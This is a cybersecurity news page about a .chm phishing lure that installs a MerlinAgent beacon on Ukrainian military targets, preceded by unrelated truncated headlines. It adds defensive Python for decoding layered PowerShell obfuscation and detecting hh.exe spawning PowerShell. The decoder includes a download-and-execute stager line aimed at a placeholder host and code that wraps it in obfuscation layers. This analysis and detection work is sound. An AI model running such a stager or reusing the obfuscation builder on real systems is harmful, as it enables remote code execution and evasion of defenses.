Ransomware Hackers and Scammers Utilizing Cloud Mining to Launder Cryptocurrency
Ransomware actors and cryptocurrency scammers have joined nation-state actors in abusing cloud mining services to launder digital assets, new findings reveal.
"Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in
The Hacker News | #1 Trusted Cybersecurity News Site
MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks
An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy a keylogger malware in attacks targeting entities in Africa and the Middle East.
Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The earliest known compromise dates back to 2021.
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be exploited by a bad actor to leak a user’s password or alter the clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper
Here’s a Breakdown of the Attack Chain:
Lure File – The deceptive file is a Microsoft Compiled HTML Help (.chm) file titled “Інфо про навчання по БПЛА для військових.v2.2.chm,” which translates to “Info about UAV training for the military, v2.2.”
When the user opens this file, the Windows HTML Help viewer renders it and runs malicious JavaScript embedded in it.
Obfuscated PowerShell – The JavaScript launches an obfuscated PowerShell script, which contacts a remote command-and-control (C2) server and downloads an obfuscated binary payload.
Payload Activation – Once decoded, the payload is a MerlinAgent beacon; it establishes communication with the C2 server and gives the attackers full control of the host.
The attack chain may seem straightforward, but the threat actors employed complex tactics and obfuscation methods to avoid detection at each stage.
Initial Code Execution – Compiled HTML Help is an old format, but modern Windows still opens .chm files with the HTML Help executable (hh.exe), so the script embedded in one still runs.
In this case the .chm file launched a PowerShell process, and that launch went undetected by the antivirus and EDR products in place.
Help File and JavaScript Execution – The .chm file acts as a container. Decompiling it reveals obfuscated JavaScript, which in turn executes an obfuscated PowerShell script.
PowerShell Execution – The PowerShell code is wrapped in multiple layers of obfuscation, including Base64 encoding, GZIP compression, and character substitution. Once unwrapped, it downloads the payload from a hard-coded URL, deobfuscates it, and saves it to disk.
Binary File Analysis – The downloaded binary, roughly 5 MB in size, is a 64-bit executable built from MerlinAgent, the agent of Merlin, an open-source command-and-control (C2) framework published on GitHub.
The framework offers encrypted C2 communication, remote command shells, module support, and more.
C2 and Infrastructure – The agent talks to the C2 servers over an encrypted channel on TCP port 443, so the beacon traffic blends in with ordinary HTTPS and is harder to single out.
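As an added example (not part of Securonix's write-up and not code from the campaign), the decoder below peels the three obfuscation layers named above from a PowerShell command line: -EncodedCommand (Base64 of UTF-16LE text), a Base64-wrapped GZIP blob inflated in memory, and a character-substitution wrapper undone with .Replace(). The sample command line, the stager text and the example.invalid URL are constructed here; the page does not give the campaign's exact substitution scheme, so the .Replace('~','e') wrapper is an assumption chosen to illustrate the pattern.

```python
"""
Added example: peel layered PowerShell obfuscation (-EncodedCommand,
Base64 + GZIP, character substitution) from a process command line.
Everything below is constructed for illustration; the stager is a
stand-in, not the campaign's payload.
"""
import base64
import gzip
import re

# Constructed inner script: the cleartext a stager would run last.
# example.invalid is a reserved, non-resolving domain.
INNER_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/stage2")'


def build_sample_cmdline(inner: str) -> str:
    """Wrap INNER in the three layers, innermost first, the way a stager
    generator would.  Used only to produce the constructed sample."""
    # Layer 3 (assumed scheme): substitute 'e' -> '~', undone by .Replace() at run time.
    assert "~" not in inner and "'" not in inner
    layer3 = "IEX (('" + inner.replace("e", "~") + "').Replace('~','e'))"
    # Layer 2: GZIP then Base64, inflated in memory through a GZipStream.
    blob = base64.b64encode(gzip.compress(layer3.encode())).decode()
    layer2 = (
        "IEX ([IO.StreamReader]::new([IO.Compression.GZipStream]::new("
        "[IO.MemoryStream]::new([Convert]::FromBase64String('" + blob + "')),"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
    )
    # Layer 1: -EncodedCommand takes Base64 of the UTF-16LE script text.
    enc = base64.b64encode(layer2.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + enc


GZIP_MAGIC = b"\x1f\x8b"
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
SUBST_RE = re.compile(r"\('(.*)'\)\.Replace\('(.)','(.)'\)")


def peel(cmdline: str):
    """Return (layers, script): the layers recognised, outermost first, and
    the text left when no further layer matches."""
    layers, text = [], cmdline
    m = ENC_RE.search(text)
    if m:
        text = base64.b64decode(m.group(1)).decode("utf-16-le")
        layers.append("encodedcommand")
    while True:
        m = B64_RE.search(text)
        if m:
            raw = base64.b64decode(m.group(1))
            if raw.startswith(GZIP_MAGIC):  # GZIP member header
                raw = gzip.decompress(raw)
                layers.append("gzip+base64")
            else:
                layers.append("base64")
            text = raw.decode("utf-8", errors="replace")
            continue
        m = SUBST_RE.search(text)
        if m:
            inner, old, new = m.groups()
            text = inner.replace(old, new)
            layers.append("char-substitution")
            continue
        return layers, text


def extract_urls(script: str):
    """Pull download URLs out of the recovered cleartext for blocking and hunting."""
    return re.findall(r"https?://[^\s\"'()]+", script)


if __name__ == "__main__":
    found, script = peel(build_sample_cmdline(INNER_SCRIPT))
    print(" -> ".join(found))
    print(script)
    print(extract_urls(script))
```

The loop stops at the first text no rule recognises, so a real sample that adds a layer this decoder does not know (string reversal, a custom XOR) surfaces as partially decoded text rather than silently wrong output; add a rule for that layer and rerun.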
This highly targeted campaign focused on the Ukrainian military. Its reliance on a file format that slips past defenses, combined with a lure tailored to its audience, underscores the need for vigilance.
Securonix recommends several mitigations: avoid downloading files from untrusted sources, monitor specific directories for suspicious activity, and deploy enhanced logging for improved detection coverage.
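As an added example of what the recommended logging coverage buys (this is not Securonix's detection content), the script below runs two checks over process-creation events: HTML Help (hh.exe) spawning a script host, and PowerShell launched hidden with an encoded command. The events are constructed Sysmon Event ID 1 style records; the field names follow Sysmon, and the rule names and sample paths are assumptions for illustration.

```python
"""
Added example: flag the hh.exe -> PowerShell parent/child chain and
hidden, encoded PowerShell launches in process-creation telemetry.
The events are constructed Sysmon Event ID 1 style JSON lines, not
logs from the campaign.
"""
import json
import ntpath
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
ENC_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s", re.I)
HIDDEN_FLAG = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)

# Constructed events. The encoded blob decodes to the harmless placeholder IEX ("x").
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # 1: the lure .chm opened with HTML Help; benign on its own
    {"EventID": 1, "Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\training.v2.2.chm'},
    # 2: the help file's JavaScript launching a hidden, encoded PowerShell
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACIAeAAiACkA"},
    # 3: an ordinary scheduled script; must not alert
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    # 4: a network event (Event ID 3); process-creation logic skips it
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationPort": 443},
])


def detect(event_lines: str):
    """Return a list of (rule_name, command_line) for every alerting event."""
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 1:          # only process-creation records
            continue
        # ntpath handles Windows paths regardless of the analysis host's OS
        child = ntpath.basename(ev.get("Image", "")).lower()
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        cmd = ev.get("CommandLine", "")
        # Rule 1: HTML Help should never be the parent of a script host
        if parent == "hh.exe" and child in SCRIPT_HOSTS:
            alerts.append(("hh_exe_spawns_script_host", cmd))
        # Rule 2: hidden window plus encoded command is the classic stager shape
        if child in {"powershell.exe", "pwsh.exe"} and ENC_FLAG.search(cmd) and HIDDEN_FLAG.search(cmd):
            alerts.append(("hidden_encoded_powershell", cmd))
    return alerts


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Rule 1 is the higher-fidelity signal because a help viewer has no legitimate reason to start PowerShell; rule 2 will fire on some admin tooling and needs tuning. Both depend on having the command line in the event: Windows Security event 4688 only records it when "Include command line in process creation events" is enabled, so turn that on or deploy Sysmon before relying on these checks.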